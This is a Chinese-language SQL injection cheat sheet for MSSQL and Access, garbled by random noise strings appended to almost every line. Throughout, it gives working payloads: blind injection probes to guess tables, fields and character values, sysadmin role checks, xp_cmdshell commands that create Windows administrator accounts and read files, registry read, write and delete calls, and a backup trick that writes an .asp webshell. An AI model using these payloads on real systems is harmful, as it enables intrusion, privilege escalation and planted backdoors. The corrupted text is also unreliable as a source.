1.判断是否有注入;and 1=1 ;and 1=2 I~l_ky|a !
2.初步判断是否是mssql ;and user>0 |6d:��k�~p
l]|&�j`�'O
3.注入参数是字符'and [查询条件] and ''=' bp�syO>lx/
G�5qsnTxUJ
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �k
Fl*�I�m
8nI~iN?"��
5.判断数据库系统 [g}^{ $�`�
��N,����w6
;and (select count(*) from sysobjects)>0 mssql q<\r}1D��m
+_:p8,
5o�
;and (select count(*) from msysobjects)>0 access �|!K&h(�J|
|6N��vByc,
:v��i ��%7
]/�!*^;cY(
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Q�+f�|.0�r
!}c �D e12
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @16y%]Q-E#
IRM jL��.q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 %en�J[a%Qg
` .`:�~_OE
9.(1)猜字段的ascii值(access) ]}SV%�*{�%
�s;h��`�n$
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 f@�Mku0VT
PE7V1U#$o,
(2)猜字段的ascii值(mssql) '0 �Ys`Qo
+]�t9��kr
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 >kA�JS??��
1%M^�MT�%&
10.测试权限结构(mssql) leHKB�u'd�
QqL?? p-S>
~o�Ov/1v},
2h5T$[f��V
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- (a!E3y5,�
e~�QLz�Z�3
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j 1��'H|�4
NHZMH!=4:n
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- cr�d|r.�"�
y�YOV:3!�"
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �6�AD&%��v
VFV���8ik)
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- XXw�Ip-��'
sU�F5Y�q:9
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��VII`qbxT
P��9\y�~W
;and 1=(select IS_MEMBER('db_owner'));-- � qjfv�9sU
^ &KH|qRrO
�y3�*�IF2G
�N�
cHC�cc
11.添加mssql和系统的帐户 J'cE@(�US�
.W�OF:Nu4
;exec master.dbo.sp_addlogin username;-- @W�+8z#xr'
;exec master.dbo.sp_password null,username,password;-- 2�1$�^k��5
�KI<�x`�b�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- f��`�8fNt�
�z��=k*D^X
;exec master.dbo.xp_cmdshell 'net user username password Zb�H6$2��r
D622:Y88�6
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �Zo-��Au��
z�h !/24p9
;exec master.dbo.xp_cmdshell 'net user username password /add';-- J�mF�`�5
K��~L"A]+
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- @TKQ_7B�cB
7({.k�D6��
$��o�\U��q
�^<yM0'0�t
12.(1)遍历目录 X�SZjuQ<[3
:�\#]uDT2=
;create table dirs(paths varchar(100), id int) VyU!r*�
�o
r'}#�usB�(
;insert dirs exec master.dbo.xp_dirtree 'c:\' \�@���2s�I
,38bT#p:,r
;and (select top 1 paths from dirs)>0 /9y'UK�l7[
!x�:��w2��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) RAyR&p����
Y�!E|�X 3�
1?+�)�T%�"
Z?"�,+�|4�
(2)遍历目录 If9!S}�
wa
y(#F�&��^|
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- hYCy�c�-�W
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 GL�l@
6S>v
ZG)C#I1;O
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Jf2:[���Mq
N_!�Zn"��J
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 X�>jwjRK
$
\v���_t:
"
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 kLY9#p=X��
\t&6$"n(B6
I|[aa�$G�
s�E�fGf.��
13.mssql中的存储过程 �xc�I�Z'�V
n�uv$B �>�
xp_regenumvalues 注册表根键, 子键 2�8+�Sz>SP
y+iuA�@WCv
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �0H.B>:�pv
kqAQrg�]n�
xp_regread 根键,子键,键值名 &sA6�o"h�~
~p�SD|��WX
;exec xp_regread o:Z*F0q��m
+�FV��crL@
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �l:+pO{7�L
H�"?-&>V-
xp_regwrite 根键,子键, 值名, 值类型, 值 Mz{ Rh+gS�
:S�7yM8�b`
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 skP_us�~�
1J�*wW# e
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �+XRv
iHA`
PuABS�>.;�
xp_regdeletevalue 根键,子键,值名 1���}q[�8q
�Q+�S�T�8�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 X�Y QU�U0R
9'8oOBqm3%
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 z06pX$�Q.<
|-aj$u�%~�
\&q�V�r1�|
C�X��'E�+�
14.mssql的backup创建webshell �a
m ��zw�
$BBf�saJPT
use model �gZ!�(��&u
6k3l/��~�R
create table cmd(str image); n��_e�z�6{
�b~1p.J��4
insert into cmd(str) values (''); |95��/�'a*
�;�q�k~�>�
backup database model to disk='c:\l.asp'; h+^T);h};|
OB^�2NL~Q~
-MEz`�7�c~
�X9gC2iSs]
15.mssql内置函数
pn7 :")Zx
tx1jBh�:e=
;and (select @@version)>0 获得Windows的版本号 f}���'gg��
��q��@-qA]
;and user_name()='dbo' 判断当前系统的连接用户是不是sa r;�T/����
#�f~�a\}$I
;and (select user_name())>0 爆当前系统的连接用户 !^fJ�AtCN]
ip�p_�?5TL
;and (select db_name())>0 得到当前连接的数据库 p���z
IMj_
E�6@�;e-]j
jr�l6��):x
?(<AT]h�V:
16.简洁的webshell U?lu@5 �^Z
�G�([vy#p�
use model 2,;t%�GB��
(Sv%-8?gs�
create table cmd(str image); N]<gH�Gj}�
|\(�/dXXP
insert into cmd(str) values (''); u�.=;���A#
dJ��^��`9W
backup database model to disk='g:\wwwtest\l.asp';
